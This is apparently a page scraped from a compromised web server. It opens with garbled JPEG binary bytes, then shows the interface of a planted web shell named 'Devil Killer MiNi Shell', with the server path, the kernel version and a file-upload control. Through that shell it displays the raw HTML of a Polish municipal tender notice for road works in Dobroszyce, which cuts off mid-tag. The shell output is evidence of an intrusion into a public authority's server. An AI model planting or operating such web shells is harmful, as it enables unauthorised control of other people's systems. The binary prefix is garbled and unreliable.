JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240711/0040930601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja dróg w Gminie Dobroszyce </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA DOBROSZYCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934779</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobroszyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-410</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@dobroszyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.dobroszyce.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja dróg w Gminie Dobroszyce </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5c87f7c9-568e-46fc-8d2a-82dbf8accf75</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00409306</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00068041/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Modernizacja dróg w Gminie Dobroszyce wraz z budową sieci wodociągowej w ul. Wielkopolnej w Dobroszycach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5c87f7c9-568e-46fc-8d2a-82dbf8accf75 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl <br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz w zakładce „Centrum Pomocy”. <br/>2.1 Zamawiający rekomenduje Wykonawcom zapoznanie się z materiałami dotyczącymi Platformy e-Zamówienia w szczególności z regulaminem dostępnym pod adresem: <br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-<br/>https://ezamowienia.gov.pl/soz/latest-faq<br/>https://ezamowienia.gov.pl/pl/komponent-edukacyjny/<br/>3. Wszelka korespondencja kierowana do zamawiającego powinna być sygnowana wskazanym nr referencyjnym sprawy.<br/>4. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. <br/>5. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). 8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>10. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: zamowieniapubliczne@dobroszyce.pl (nie dotyczy składania ofert).<br/>11. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ - zaleca się przesłanie wniosku w wersji edytowalnej na adres e-mail: zamowieniapubliczne@dobroszyce.pl <br/>12. Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.46.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przebudowa ulicy Owocowej w Dobroszycach<br/>W ramach zadania należy wykonać przebudowę ulicy Owocowej o długości ok. 106,00 m i szerokości 5,00 m, w miejscowości Dobroszyce w zakresie m.in.:<br/>a) budowy jezdni i placu manewrowego na końcu sięgacza o nawierzchni z kostki betonowej,<br/>b) budowy zjazdów i dojść do prywatnych posesji z kostki betonowej, <br/>c) wykonania obustronnych poboczy o szer. 0,75 m,<br/>d) budowy sieci kanalizacji deszczowej z odprowadzeniem do skrzyń rozsączających<br/>e) budowy kanału technologicznego o długości 97,0 m; od zaprojektowanych studni rewizyjnych należy wykonać przyłącza z rury 1xHDPEØ40/3.7 mm, do granicy każdej posesji. Rure przy granicy zaślepić. Głębokość układania jak dla KT.<br/>- zgodnie z załączoną dokumentacją projektową. Roboty budowlane należy wykonać na działce drogowej nr 437/9, obręb Dobroszyce, gm. Dobroszyce, powiat oleśnicki, woj. dolnośląskie.<br/>Ulica Owocowa jest drogą publiczną w rozumieniu ustawy z dnia 21 marca 1985r. o drogach publicznych (Dz.U. z 2023r. poz. 645 z późn.zm.).<br/>1.1. Przedmiot zamówienia należy wykonać na podstawie i zgodnie z:<br/>- dokumentacją projektową, <br/>- Specyfikacją Techniczną Wykonania i Odbioru Robót,<br/>- niniejszą SWZ.<br/>Zamawiający informuje, że w dokumentacji znajduje się zaświadczenie nr 513/2021 Starosty Oleśnickiego z dnia 18.10.2021r. znak sprawy AB.6743.805.2021.3.SzM o braku sprzeciwu na zgłoszenie, dotyczące przebudowy ulicy Owocowej w Dobroszycach, na działce o nr ew. gruntów 437/9, obręb Dobroszyce, jedn. ewid. Dobroszyce.<br/>1.2.	Przedmiot zamówienia został opisany w dokumentacji projektowej pn. „Przebudowa ulicy Grzybowej oraz przebudowa ulicy Owocowej w miejscowości Dobroszyce” autorstwa mgr inż. Jacka Kostórkiewicza; wykonanej przez jednostkę projektową: RoadKost Jacek Kostórkiewicz Projektowanie i Nadzór Inwestycji Drogowych, z siedzibą: 54-031 Wrocław, ul. Zakopiańska 109, na którą składa się: <br/>a)	Projekt budowlany – stanowiący załącznik nr 9.1 do SWZ,<br/>b)	Projekt techniczny – stanowiący załącznik nr 9.2 do SWZ,<br/>c)	Uzgodnienia – stanowiące załącznik nr 9.3 do SWZ,<br/>d)	Specyfikacja techniczna – stanowiąca załącznik nr 9.4 do SWZ,<br/>e)	Opinia geotechniczna – stanowiąca załącznik nr 9.5 do SWZ,<br/>f)	Projekt tymczasowej organizacji ruchu - stanowiący załącznik nr 9.6 do SWZ,<br/>g)	Przedmiar robót – stanowiący załącznik nr 9.7 do SWZ,<br/><br/>Wszystkie wyżej wymienione dokumenty nawzajem się uzupełniają. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Przebudowa i rozbudowa ul. Łąkowej w Dobroszycach.<br/>W ramach zadania należy wykonać przebudowę ulicy Łąkowej o długości ok. 304 m i szerokości 5,00 m, w miejscowości Dobroszyce w zakresie m.in.:<br/>a)	budowy jezdni o nawierzchni z kostki betonowej,<br/>b)	budowy lewostronnego chodnika o szerokości (netto) 2,00 m z kostki betonowej,<br/>c) budowy zjazdów i dojść do prywatnych posesji z kostki betonowej, <br/>d) wykonania prawostronnego pobocza o szer. 0,75 m z kruszywa,<br/>d) budowy sieci kanalizacji deszczowej,<br/>e) budowy kanału technologicznego,<br/>- zgodnie z załączoną dokumentacją projektową. Roboty budowlane należy wykonać na działkach nr 498/5, 503, 504/8, 504/9, 504/20, 504/26, 507, 508/5, 505/3 (po podziale 505/4) obręb Dobroszyce, gm. Dobroszyce, powiat oleśnicki, woj. dolnośląskie.<br/>Ulica Łąkowa nie jest drogą publiczną w rozumieniu ustawy z dnia 21 marca 1985r. o drogach publicznych (Dz.U. z 2023r. poz. 645 z późn.zm.).<br/>1.1. Przedmiot zamówienia należy wykonać na podstawie i zgodnie z:<br/>- dokumentacją projektową, <br/>- Specyfikacją Techniczną Wykonania i Odbioru Robót,<br/>- niniejszą SWZ.<br/>Zamawiający informuje, że złożył do Starosty Oleśnickiego wniosek o wydanie decyzji o Zezwoleniu na Realizację Inwestycji Drogowej dla robót budowlanych pn. „Przebudowa i rozbudowa drogi gminnej ul. Łąkowej w Dobroszycach, w drodze ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2023 r. poz. 162). Przewidywany termin wydania decyzji to przełom lipca i sierpnia 2024r.<br/>2.2.	Przedmiot zamówienia został opisany w dokumentacji projektowej pn. „Przebudowa i rozbudowa drogi gminnej ulicy Łąkowej w Dobroszycach” autorstwa mgr inż. Jacka Kostórkiewicza; wykonanej przez jednostkę projektową: RoadKost Jacek Kostórkiewicz Projektowanie i Nadzór Inwestycji Drogowych, z siedzibą: 54-031 Wrocław, ul. Zakopiańska 109, na którą składa się: <br/>a)	Projekt zagospodarowania terenu – stanowiący załącznik nr 10.1 do SWZ,<br/>b)	Projekt techniczny – stanowiący załącznik nr 10.2 do SWZ,<br/>c)	Uzgodnienia – stanowiące załącznik nr 10.3 do SWZ,<br/>d)	Specyfikacja techniczna – stanowiąca załącznik nr 10.4 do SWZ,<br/>e)	Opinia geotechniczna – stanowiąca załącznik nr 10.5 do SWZ,<br/>f)	Projekt tymczasowej organizacji ruchu - stanowiący załącznik nr 10.6 do SWZ,<br/>g)	Projekt stałej organizacji ruchu - stanowiący załącznik nr 10.7 do SWZ<br/>h)	Przedmiar robót – stanowiący załącznik nr 10.8 do SWZ,<br/>i)	Lokalizacja zjazdu na działkę nr 498/8 – stanowiący załącznik nr 10.9 do SWZ.<br/>Na działkę nr 498/8, obręb Dobroszyce należy wykonać zjazd z ul. Łąkowej o konstrukcji jak dla pozostałych zaprojektowanych w dokumentacji zjazdów, w lokalizacji jak na załączniku nr 10.9 do SWZ.<br/><br/>Wszystkie wyżej wymienione dokumenty nawzajem się uzupełniają. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">112 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.	Modernizacja drogi powiatowej nr 1475D w relacji Strzelce – Sadków – Łuczyna.<br/>W ramach zadania należy wykonać remont drogi powiatowej nr 1475D w relacji Strzelce – Sadków – Łuczyna w gminie Dobroszyce, w zakresie m.in.:<br/>a) wykonania jezdni o szerokości 5,00 z lokalnymi poszerzeniami do 7,00 m o nawierzchni bitumicznej,<br/>b) wykonania konstrukcji drogi (podbudowy), <br/>c) wykonania obustronnych poboczy o szer. 0,75 m z kruszywa<br/>d) remont istniejących zjazdów z drogi powiatowej polegający na wykonaniu nawierzchni bitumicznej wraz z podbudową,<br/>e) przebrukowanie istniejących nawierzchni zjazdów z dostosowaniem do poziomu nowej nawierzchni drogi,<br/>e) odtworzenia, reprofilacji i oczyszczenia przydrożnych rowów,<br/>f) wymiany na nowe, części krawężników przy drodze wojewódzkiej nr 340 w Strzelcach (na skrzyżowaniu z drogą powiatową nr 1475D),<br/>g) koniecznej wycinki przydrożnych drzew i krzewów<br/>h) przebudowy włączenia drogi powiatowej nr 1475D do drogi wojewódzkiej nr 340 w m. Strzelce<br/>- zgodnie z załączoną dokumentacją projektową. Roboty budowlane należy wykonać na działkach drogowych: nr 24, obręb Strzelce; 60, obręb Sadków; 183/5, obręb Łuczyna, jedn. ew. Dobroszyce, powiat oleśnicki, woj. dolnośląskie.<br/>3.1. Przedmiot zamówienia należy wykonać na podstawie i zgodnie z:<br/>- dokumentacją projektową, <br/>- Specyfikacją Techniczną Wykonania i Odbioru Robót,<br/>- niniejszą SWZ.<br/>Zamawiający informuje, że w dokumentacji znajduje się zaświadczenie Starosty Oleśnickiego z dnia 17.04.2024r. znak sprawy AB.6743.220.2024.3.MP o braku sprzeciwu na zgłoszenie, dotyczące remontu drogi powiatowej nr 1475D w relacji Strzelce – Sadków - Łuczyna, na działkach: nr ew. gruntu 24, obręb Strzelce, jedn. ew. Dobroszyce – obszar wiejski, nr ew. gr. 60, obręb Sadków, jedn. ew. Dobroszyce – obszar wiejski, nr ew. gruntu 183/5, obręb Łuczyna, jedn. ew. Dobroszyce – obszar wiejski.<br/>3.2.	Przedmiot zamówienia został opisany w dokumentacji projektowej pn. „Remont drogi powiatowej nr 1475D w relacji Strzelce – Sadków – Łuczyna w gminie Dobroszyce” autorstwa mgr inż. Jacka Kostórkiewicza; wykonanej przez jednostkę projektową: RoadKost Jacek Kostórkiewicz Projektowanie i Nadzór Inwestycji Drogowych, z siedzibą: 54-031 Wrocław, ul. Zakopiańska 109, na którą składa się: <br/>a)	Projekt budowlany – stanowiący załącznik nr 11.1 do SWZ,<br/>b)	Projekt techniczny – stanowiący załącznik nr 11.2 do SWZ,<br/>c)	Uzgodnienia – stanowiące załącznik nr 11.3 do SWZ,<br/>d)	Specyfikacja techniczna – stanowiąca załącznik nr 11.4 do SWZ,<br/>e)	Projekt tymczasowej organizacji ruchu - stanowiący załącznik nr 11.5 do SWZ,<br/>f)	Przedmiar robót – stanowiący załącznik nr 11.6 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">112 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 